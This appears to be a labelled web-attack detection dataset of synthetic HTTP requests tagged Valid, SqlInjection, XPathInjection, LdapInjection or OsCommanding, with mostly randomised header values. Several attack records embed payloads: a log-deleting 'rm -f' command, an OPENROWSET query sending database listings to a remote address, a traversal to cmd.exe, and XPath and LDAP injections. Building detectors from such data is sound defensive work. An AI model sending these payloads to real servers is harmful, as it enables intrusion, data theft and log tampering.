GET /sVj6B3T/teiiN8Heko/3neaqrtrths8dthneah/fz6bWBOiWVu/uHCBm7E1hn8/ire/ssdtsapnqEpebAt/Ee71ASvoIf/Tsan6atear/v8D3PckA3/eTvyjyMGK1Gud7gz/na.jpeg? HTTP/1.0
Host: 206.16.251.240:67
Connection: close
Accept: text/*;q=0.3, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=01
Client-ip: 246.244.195.20
Cookie: rE2la88auie6wha=enh=i;tt3ltzarm=script;mrucDaiseoh5m=861;_Jdb=1henataam/n
Cookie2: $Version="667"
Date: Mon, 07 May 07 22:50:29 UTC
ETag: W/"70RV38@MF.et0pJ.A"
Expect: krNrei7
From: rtat7i@re8ta.net
If-Modified-Since: Tue, 18 Sep 07 10:13:02 UTC
If-Unmodified-Since: Sun, 17 Apr 05 22:43:46 UTC
If-Match: "m80TAJl8TPgO7XVi"
If-None-Match: *
If-Range: Wed, 23 Sep 09 03:17:20 UTC
Max-Forwards: 124
MIME-Version: 5.8
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: Basic MnRhYXRpOmg2bGFheQ==
Range: 94913-68559,806419-4130
Referer: /4cmTrg3/rire/qEOt/adsto/dt7i.mdb
TE: gzip;q=0.0,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (X11; U; Solaris 1.9; NE-oH; rv:1.7.5) Gecko/24941925
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: FTP/3.0 www.exnbfE9R.gif
Transfer-Encoding: bhcai
Upgrade: Enrn/3.4, fzwwb/4.7, gind/5.9, Clj9j/8.1
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24723
Start - Id: 25120
class: Valid
GET /eavA/blsaiwasi6dhltttn/coRezt5o/ibceaee/ioitu/mPRKP/mtfceenamuauem/sMhsuotlsekK/jWRQV3_q5qgVjd4yGKsR.css? HTTP/1.0
Host: 156.103.9.162
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.0, compress
Accept-Language: Ritwn-oane, HnctSeu-emrtutd, nlqer-so8ed2es
Cache-Control: min-fresh=2317
Client-ip: 67.105.118.24
Cookie: IefTInepA=aeipsarl0;skndnh=e];eln47q=jrgTaAnaef;wSeq9s4Ni=h(formv;mretN1el= aees
Cookie2: $Version="59"
Date: Thu, 28 Jun 07 10:47:10 CET
ETag: "M5AZc5ENUI._eDk@24S"
Expect: sJrh=kltenase;itik
From: hixb@siilehs.org
If-Modified-Since: Sat, 17 Jan 09 08:17:56 UTC
If-Unmodified-Since: Sat, 30 Apr 05 15:07:38 UTC
If-Match: *
If-None-Match: "zF9R7GXug9tlddc_"
If-Range: *
Max-Forwards: 70
MIME-Version: 2.8
Pragma: Fo=leih
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Basic dG9uaDY6d2xvdXNlc2U=
Range: 418-75506
Referer: http://www.oelt6oos.st/Anns3lrn.bin
TE: chunked,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 7.5; dd-ca; rv:9.6.1) Gecko/15703409
UA-CPU: StrongARM
UA-Disp: 9555,789,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x680
Via: 7.7 www.gonfl5e.shtml:59908, FTP/7.8 65.24.179.47:5814, tpi1nM/4.6 www.qrtey.css
Transfer-Encoding: gzip
Upgrade: rle/3.1, oaatl/1.5, seeNg/9.4, nHrat/7.6, tsarti/6.4
Warning: 856 www.otgia.css "oabfnoRfoehnueGi" "Tue, 04 May 10 20:01:11 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 714579
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25120
Start - Id: 18927
class: Valid
GET /peh65uaa2crry/c1m0.tiff?nthifbtxtqn=aVM_ESKk&zlcriiv=6seaew&ry4ed=exechyeesqirupdate&ijhonla=%28o%40 HTTP/1.0
Host: 144.95.187.117:5
Connection: keep-alive
Accept: application/*
Accept-Charset: windows-1254;q=0.8, isiri-3342;q=0.5, windows-874;q=0.0, shift_jis
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale=5494
Client-ip: 229.0.200.112
Cookie: awtdnryIl=pbq7yetosinsed;oelLwitiuodw=xdbe
Cookie2: $Version="06"
Date: Thu, 21 Oct 04 09:44:13 CET
ETag: W/"su.O@LDx_sPJFRT9"
Expect: oetsEour
From: eb4jab@1o2nqwlt8.biz
If-Modified-Since: Fri, 07 Oct 05 17:58:02 UTC
If-Unmodified-Since: Sun, 01 Oct 06 14:23:50 UTC
If-Match: "92QMWvtmdQMZqisfa.D2"
If-None-Match: "1c0JHlTUgOYtO_Moe7"
If-Range: *
Max-Forwards: 822
MIME-Version: 6.2
Pragma: u='asIq'
Proxy-Authorization: Digest nonce
Authorization: Digest qop=oflieizy
Range: -41,827169-245
Referer: http://www.yramnoan.gov/eHuw/aoot/e5eTnaZ/ohsetP.nsf
TE: gzip;q=0.5
Trailer: If-Match
User-Agent: Mozilla/0.1 (compatible; Konqueror/0.0; Mac OS X; e8rpR1srn; tUnR)
UA-CPU: Sparc
UA-Disp: 112,418,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: poacae/1.5 www.s7bnohue.css, FTP/1.7 227.206.111.186, HTTP/6.6 234.2.234.4
Transfer-Encoding: gzip
Upgrade: ensdmo/4.9, 8gvNs/8.5, evntyz/9.1, 7nshfi/4.0
Warning: 206 www.rcar.js "iacalyetteu3rehb" "Sat, 27 May 06 22:33:16 GMT"
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18927
Start - Id: 35634
class: XPathInjection
GET /QttfayLrd/iebahno.gif?e5lidt7da6atio=2&6xnak=9&set=to4KwporThmd&5nginwlt=b1of112&lr6tugnbreybg=eitznnmdemnh&poootn9u=basajreinblbo&ensortT=homesi+aerpasswdvbscript68r3linksxwhere&JFO4dl7G58S=nE&csilanguuLy0de=ctj&hT4ec9ged=24492254&tlo7oh85tryoo=%28i++++%3C+++++count%28Pt%2Fchild%3A%3Atext%28%29%29++and++j++%3C+count%28weHgsn%2Fchild%3A%3Acomment%28%29%29+and++k+++++%3C+count%28udghde%2Fchild%3A%3A*%29++%29 HTTP/1.0
Host: www.ssnoe.com
Connection: keep-alive
Accept: text/xml;q=0.6, video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, gzip, gzip, identity;q=0.0, gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 108.171.74.43
Cookie: rmXaonebitt=stbdebo9nnAr;vcgdr4igrmereoo=uF1W.FBclty;scriptqQt=aSoJ
Cookie2: $Version="248"
Date: Mon, 04 Sep 06 19:48:56 CET
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: 100-continue
From: rzin8cri@efHTe5.be
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Mon, 23 Oct 06 12:40:57 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Feb 10 04:29:02 GMT
Max-Forwards: 987
MIME-Version: 6.3
Pragma: ih='grh'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Basic bGVlbnRxOnNvc2U0blI=
Range: -38,162-85,-031
Referer: http://pjdrm.uk/EuSe4pmi/nool/wt9h/Hi2eph/0B9ellta.bin
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/9.1 (compatible; Dtgszwpte; Win98; 8deyffhnw)
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: 7.6 www.oxfmgklo.tiff
Transfer-Encoding: gzip
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35634
Start - Id: 35508
class: XPathInjection
GET /wp-gc.p0/ztP5Pn6qRjuTGDxtM.shtml? HTTP/1.1
Host: www.stSToisitn.st:74
Connection: keep-alive
Accept: text/xml;q=0.7, image/*
Accept-Charset: utf-7;q=0.7, euc-tw, isiri-3342;q=0.9, x-mac-hebrew
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=8958
Client-ip: 154.234.253.239
Cookie: v8onrrhtndter=47638097;uy=Masme5nReuelRe;qaavi=e3s;eduecazeiio80fn=277  or    1<   Rjhige/5/r/child::text()[position()=993]     or     1='] | /* | /foo[bar=';resetash8t=mHAhH;lsbFZPMj-Wk=b
Cookie2: $Version="9"
Date: Sun, 20 Mar 05 15:27:16 UTC
Expect: ddweenu8=tNluye;oiak=Tifht
If-Modified-Since: Thu, 15 Apr 10 19:30:27 GMT
If-Unmodified-Since: Tue, 27 Jan 04 16:49:46 UTC
If-Match: "errOkRYScGRzTeQOZh"
If-None-Match: "HTuNXit.KseZAyHDLxWk"
If-Range: *
Max-Forwards: 83
MIME-Version: 1.6
Pragma: fl9IUn8='eaggoos'
Authorization: Basic ZXByYXA6aW4wY2xlbGg=
Range: -70272,617446-068,-06
Referer: /rTneR/aW6d2j/nasm1eas/xgorOln/bFlno.gz
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 6.4; o8-yT; rv:7.6.7) Gecko/73556566
UA-CPU: Sparc
UA-OS: FreeBSD
Via: 9.3 www.ccspoha.tiff
Transfer-Encoding: deflate
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35508
Start - Id: 38734
class: LdapInjection
GET /I./orr/s9.swf?3mwinsertUh=ua9hereSwduhposition&y0tigswhtnxh=hMpptcacTf&eiip9=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sxeixealo8s=rotLRltH&t2nf=51029&Duo=oSNukeQol%40-J HTTP/1.1
Host: www.nkusa.cz
Connection: nVwede
Accept: image/*;q=0.1, application/*, video/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ahstohds-9xAjags;q=0.4
Cache-Control: max-age=34191
Client-ip: 132.36.253.148
Cookie: A0n=23;5yid=akkBP-3AAG@;ao=mKK0kYEhb;XCes=hc%;1zTodei2e=o En;ltngrhnN=nnih6r d
Cookie2: $Version="9"
Date: Sat, 20 Nov 04 08:10:34 GMT
ETag: "3@dn_UCGIlqI_Vtrv8"
Expect: 100-continue
From: siyWs@6ac5m.it
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Fri, 16 Jul 04 04:14:24 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: *
If-Range: Thu, 07 Aug 08 05:05:00 CET
Max-Forwards: 455
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: Digest username="76nlskE"
Range: -753,93960-,-52
Referer: /2Aoit/oihXzii.jsp
TE: chunked,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 1.7; jb-id; rv:8.9.2) Gecko/00056693
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: gda/7.2 255.10.246.150, 2.0 www.hiolr.css, 6.7 www.emfbSl.css
Transfer-Encoding: deflate
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38734
Start - Id: 43297
class: OsCommanding
GET /6tVl55/oxefhahs5we/yR4hAiowGGze7-s.ErD/aK.28eLnQthta/tuj/qx.mspx?ofh3=9420900&ii=819&dtnaph7wdis=%250arm+-f+%2Fvar%2Flog%2Fhttpd%2Faccess_log++++%3B&aolncLeo=u31tD&7eEte2e=e5LqQ1Z2Yovm&ef6utszpNgihs=uehlenlnhst&eGhHw6T00Q=6&eEud7tsdna9st=996802&aSoto=pb_zVe&kgjN0hUHSN24=b&oee9taoaspwgaU=lhmWies1Ee2d9&gs8ee=82&etp8copyIewindow.open=o4eawslp9Hgal%3E&qtaiag=rtwea8airaad+1s&bst2t=execeshttpb+jarmo HTTP/1.0
Host: 47.194.139.188
Connection: eaiahhe
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 244.144.138.121
Cookie: icU=lkt;1@SSdd=oWu;ywyfroElwe=l3passwdg;Yt=vWxL
Cookie2: $Version="50"
Date: Sat, 26 Mar 05 13:55:44 CET
ETag: "1AjIN8knmDrbYXPi"
Expect: mb9t=tpt6m;rlemLtar
From: nJanczi@m0dios.gov
If-Modified-Since: Wed, 04 Feb 04 15:37:36 GMT
If-Unmodified-Since: Sat, 06 Nov 04 16:09:13 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 82
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM YXN0aWluT29qd3VtZWFrbk50aWh0bG1zaXJydGU5RGludEhla3ZlaHRlNXRtYWw=
Authorization: Digest nc=e66a33d5
Range: 534213-
Referer: /sMkojet.zip
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: jghq4akdo (nDkERmx; pn-Lcz0Y2P; rLAfrvK)
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: evemx/1.6 142.180.216.74, HTTP/5.0 www.iv8air.gif, 1.2 www.hherTlg.htm
Transfer-Encoding: zlag
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 33268910997830583
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43297
Start - Id: 21399
class: Valid
GET /sock_streamM45es_7/ngcgNgytpiicmrSock/_5WtV-DX_dW-LN/egn/6R/ete9/4kdqnullPo6SKacceptWiinJ/hxittNqen/4yjvapbAHb8xeh3oMZ/yeatsuso7ithasoemi/nahb3/p6a@Yxd@96RTYE.aO5c.sh? HTTP/1.1
Host: 249.179.201.137
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.2
Accept-Encoding: gzip, identity, identity, deflate;q=0.2
Accept-Language: *
Cache-Control: min-fresh=84819
Client-ip: 164.228.90.123
Cookie: bi=528;oiadv=t9j
Cookie2: $Version="336"
Date: Wed, 22 Sep 04 24:20:12 GMT
ETag: W/"SfvfJWgli17mfeKrc2X"
Expect: 100-continue
From: VeRntuyv@diet9o.org
If-Modified-Since: Mon, 07 Jun 04 02:51:21 CET
If-Unmodified-Since: Wed, 13 Jun 07 11:16:47 UTC
If-Match: "HG@d2d4dnkUt7aK"
If-None-Match: *
If-Range: "hPrQg1wdKCoTZ2W"
Max-Forwards: 3639
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: niiafr ve3n=esohhuo1
Authorization: Basic YWEwaTpkYWZydw==
Range: -6997
Referer: http://www.mtNieae.biz/jcose/iskt/8hlep/snnerll.asp
TE: gzip;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: 5Unou/5.3.5
UA-CPU: StrongARM
UA-Disp: 0248,8478,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 358x1350
Via: h0usmd/8.6 www.Tsdrrsnc.gif, caleo/1.6 54.112.129.106, 3.8 www.rAhn6h.html
Transfer-Encoding: compress
Upgrade: zhgap/2.8, netcaY/3.4, ocaAnm/5.3
Warning: 043 24.229.27.123 "ortNea7pt" 
X-Forwarded-For: 131.153.107.61
X-Serial-Number: 2418413
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21399
Start - Id: 36743
class: OsCommanding
GET /zTn6n7qXzRig/wnss/syctecux9egsesjr/enlieEn2ezat.asmx?j5wtelNsglg=s%3BF8tu&eqaosn6alsusiar=%5Cn++++uftp+-p++www.gees.com+++%2Ficel%2Fatgerirail%2Fre%2Fat%2Ficicta%2Fma HTTP/1.1
Host: www.5nt9aHd1nd.uk
Connection: keep-alive
Accept: text/xml;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iaolni-aziz, iblOe-io, uny-ethls;q=0.3, 1dtafd-sueiae;q=0.6
Cache-Control: min-fresh=62
Client-ip: 114.229.84.195
Cookie: pejwwsnroiti6e=itshecalr5xtermtedocument;GVuhmocha=0;utodhtxibntotoe=guss
Cookie2: $Version="70"
Date: Fri, 05 Feb 10 11:53:42 UTC
ETag: "Pj4xEi@aI3WQBD3"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Sun, 21 Mar 10 09:40:02 GMT
If-Unmodified-Since: Thu, 06 Sep 07 22:04:30 CET
If-Match: "Bzp4oCgH-jAMrEt"
If-None-Match: "jCQ.nuPqlOxdDxD"
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 8884
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Rrf1lpt
Authorization: NTLM Z2FrZ0lzbTd0Y29Jd0VzbTBxdXMxZWNmbHNFaG9lZWx0ZXNwbWlhbjZvYWU=
Range: 50-7
Referer: http://ediN0Gl.de/snoso/rewenk/mqnouy.msf
TE: gzip;q=0.2
Trailer: From
User-Agent: augH/8.1.3.3.5
UA-CPU: Sparc
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1003x5848
Via: 9.3 www.etflo.css, 5.9 www.neotci7o.shtml
Transfer-Encoding: deflate
Upgrade: evenU/1.9, Quheec/0.8, sieT/8.6, e9Rslt/7.3, iZner/9.0
Warning: 827 200.163.181.184 "tisa" 
X-Forwarded-For: 4.110.8.55
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36743
Start - Id: 24349
class: Valid
GET /j_z8/eseEsnarom/oG9bdF0xiid9/4gI_Cu/XQC_SE/0ocit/ek2q0_Ex2/tXEMW5RS9lDlVVb/xdsc4/5y-b2svidLMAxtermX/QGHt6j.UwinntUh@mPautoexec.tiff?iZ1l=w3d&a6=emodeo&e3hztn6=oeeIocnaOey4ia1cn&X93tSq=+h&a99=a7RS%40afjf&Etyu=6536664&Afnxslat=t&hh=cb0+eenly&P0aetc.dx=wldoedrzx9o0smjcd&atSsmiht=3507530336 HTTP/1.0
Host: www.slLepwf.uk
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: cp-936, windows-1250, x-mac-korean, x-mac-japanese
Accept-Encoding: compress, gzip;q=0.9, identity;q=0.1, compress, compress;q=0.4
Accept-Language: r-x, ks-wat0tahi;q=0.8, Cfiob-Yett;q=0.4
Cache-Control: min-fresh=6
Client-ip: 114.108.65.238
Cookie: 6aytrlsaamne=randrHiseoenitdhia;det=73728
Cookie2: $Version="7"
Date: Tue, 09 Sep 08 20:30:29 UTC
ETag: W/"oYQn3hQ5ZrzAsmpQ"
Expect: nirh
From: 5hRu@STpwssetis.be
If-Modified-Since: Mon, 13 Oct 08 19:01:16 UTC
If-Unmodified-Since: Sun, 06 May 07 20:18:16 UTC
If-Match: *
If-None-Match: "5uJOJAJRktU.Z1HNa9O"
If-Range: "VSsYy89YyIt-uvl1HlLy"
Max-Forwards: 01
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM dU9yMWRmeDB3dGV0MHNSd2JsRGR0aTJodklvRWVubzduZw==
Range: -290,922508-,-602
Referer: http://iegtnbb.biz/imir/eez2.asp
TE: deflate,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 7.9; xo-ue; rv:9.9.7) Gecko/19156027
UA-CPU: Sparc
UA-Disp: 6787,924,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 352x5203
Via: 5.0 177.159.8.102
Transfer-Encoding: gzip
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24349
Start - Id: 41793
class: SqlInjection
GET /iYxt@@@D/yQPM7/nNRG-waJ@e8cB64XZu/nnZkmVv_Bbn0EHzqh/a8LAdVb-EC/68andimgp3c2mochaB34s/eaolbei/yVZ/tekfhgart5/esnhtKmshqWgen/yctnQai.php4?cprtmgieEa=0&pdrUdmanbt=%3B+insert+into+OPENROWSET%28%27SQLoledb%27%2C%27uid%3Dids%3Bpwd%3DonTnRtdrEu%3BNetwork%3DDBMSSOCN%3BAddress%3D79.138.1.51%2C1433%3B%27%2C%27select+*+++from++_sysdatabases%27++++%29%3B+++select++++*+++from++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&lbhzH3c=lsk&ehxaooaI=aqZg-CoIlnxY&laoaoisePrdndri=3 HTTP/1.0
Host: www.vAckcxvr.st:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.1, x-mac-icelandic
Accept-Encoding: 
Accept-Language: th2mx-opclel, phtr1-s, n6ihclhb-c2ue, rarld-bYodT9, Rtar-mer
Cache-Control: only-if-cached
Client-ip: 218.44.126.244
Cookie: ensstiaav=af8NUYejY8;qroeti=onNON-I;dn=n eLioNdohe4p;zNt=giyh@G@Bvk;7hs=Smrc;
Cookie2: $Version="3"
Date: Tue, 05 Jul 05 24:55:21 CET
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: onotkol
From: nIeior@tiriRlyas.net
If-Modified-Since: Fri, 10 Aug 07 07:03:30 CET
If-Unmodified-Since: Tue, 30 Jan 07 01:15:39 CET
If-Match: *
If-None-Match: "ULyeBhS_17z3tmEq1"
If-Range: *
Max-Forwards: 41
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: d1uu Mdhuae=hWshe
Range: 82059-
Referer: http://5b1E.de/uh8jdria/haftzi9.php3
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: I7es/4.4.4.2.1
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: gzip
Upgrade: heensd/7.9, eiv/7.2, s6i/1.4, aaxlid/6.5, ga4l/7.2
Warning: 426 159.202.208.161 "deuobinrttskRs" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 17122995024045170296
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41793
Start - Id: 9923
class: Valid
GET /JbGPID8httpsVh/0vesrbu/jihk2hNsnadi/Urwoeqemo/bq.W3mKZINDKwQh0CO/taaoF5.M07RX/ee4ac558etpA1eki.jpg?ahh=15968&eXDGwhereQ@O0AxU=arylen&isoan0ay=t&ot69nrincreSgn=77400&an=s%7Et%29c&URetcInodehMr=eta&acceptSUS0ig=7606465&edlLorperh6gype=eiouf%40Q8 HTTP/1.0
Host: www.ehn3hiqewe.net
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 176.83.236.118
Cookie: aorsmheiocwokT=gS9QkFwGN;H7ges=7800;uo=Ur4oAhidyo;4B9HwClprocessing-instruction=01684078;InullPAMrly3=asagseih9soms;LdAjuuS=3io
Cookie2: $Version="2"
Date: Sat, 24 Mar 07 20:33:43 CET
ETag: "vx4sXFZuE2ziptGDL"
Expect: m8dkgye
From: xGtn@mhhy.de
If-Modified-Since: Thu, 23 Feb 06 15:55:12 GMT
If-Unmodified-Since: Sun, 02 Apr 06 11:43:51 CET
If-Match: "1PG12tYqrxIIU2qZ8.b"
If-None-Match: "Ebtt2qSGbMJ@lY7q"
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 3
MIME-Version: 4.6
Pragma: saa='eDcsxs'
Proxy-Authorization: Digest realm
Authorization: Basic cG5paWVkOnJob28=
Range: -073,-7284,0-
Referer: /ehli/bhraau/enonafou.tiff
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.4 (X11; U; Open BSD i586 9.2; pz-aR; rv:2.7.5) Gecko/61104262
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 496x973
Via: HTTP/4.5 www.ethaerr.html:50, 5.7 196.27.129.232, 2dnyua/7.5 227.252.113.137:507
Transfer-Encoding: releev; Hufaru=bta5pnev
Upgrade: dauz/8.3, e8tu/1.3, caH/0.7, Ass/4.7, enfo/0.0
Warning: 465 www.rewstm.jpeg "srthru38ehh" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 15113
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9923
Start - Id: 17941
class: Valid
GET /b8uRrieesocao/vosinkuia6dsd/wcDts6m/xJcQu0Z/fjeaW/yavlan6yf8oNe34A/Oreplace3CsUH.asp? HTTP/1.0
Host: 214.140.232.120
Connection: beutep
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 136.196.112.139
Cookie: xroG4koSeSp=64755690;A2iniywn=6752;ss0tg=|jnrysh+ssr;eflrtrchMaou=2521;zto5nmf=htstylelne
Cookie2: $Version="9"
Date: Sat, 23 Aug 08 12:56:22 GMT
ETag: "qxB3@Nz@NrSLH-v"
Expect: 5eals
From: eua3@ehkkbs.cz
If-Modified-Since: Sun, 18 Feb 07 16:04:30 UTC
If-Unmodified-Since: Sun, 12 Jul 09 12:37:01 UTC
If-Match: *
If-None-Match: "KpJ46fLJSNQoka.wM"
If-Range: "uvL-F_t4VlfqnNyW"
Max-Forwards: 4
MIME-Version: 1.5
Pragma: epett5ae=ihIagtw
Proxy-Authorization: Digest nonce
Authorization: ogea ohLh=ven3et
Range: 05-,-776516,-07
Referer: http://www.yd8i.fr/nnqBopNt.wmn
TE: gzip;q=0.6,chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/5.3 (X11; U; Solaris 2.7; hi-wi; rv:8.5.6) Gecko/49823008
UA-CPU: PowerPC
UA-Disp: 5395,1752,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5744x7610
Via: FTP/1.5 www.oiodoeun.tiff
Transfer-Encoding: deflate
Upgrade: teiEei/2.2, 59i/8.6, owtOe/6.7, sqo/0.4
Warning: 581 30.194.231.249 "ddy6k5hz4tNengrbnO" "Fri, 05 Sep 08 08:53:57 UTC"
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 126359960937
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17941
Start - Id: 44153
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.oto6atane8.it
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: hz-gb-2312, utf-7;q=0.6
Accept-Encoding: identity, identity, deflate
Accept-Language: NiIh-l, etiasbw-rjtdda, e8-hpo, rfLoso6c-Wey5L;q=0.1
Cache-Control: min-fresh=14
Client-ip: 5.92.107.40
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="0"
Date: Mon, 27 Mar 06 23:44:05 CET
ETag: W/"KuJgjGf4aIE960gFup"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Mon, 14 Aug 06 10:01:38 GMT
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 9225
MIME-Version: 7.5
Pragma: l2='nndRc'
Proxy-Authorization: Digest realm
Authorization: NTLM bHRoVXV0b2hXbDRhdHNsYW5lb2lpZDBhczkzbGloRmVocDBsYW5rY0E=
Range: 815-,644-20793
Referer: http://l0eur.it/iHdrorf/oLD0Snt1/snalyHh/aegjscie/dShsbhu.mdb
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 7.8; kl-sn; rv:6.7.5) Gecko/78656944
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
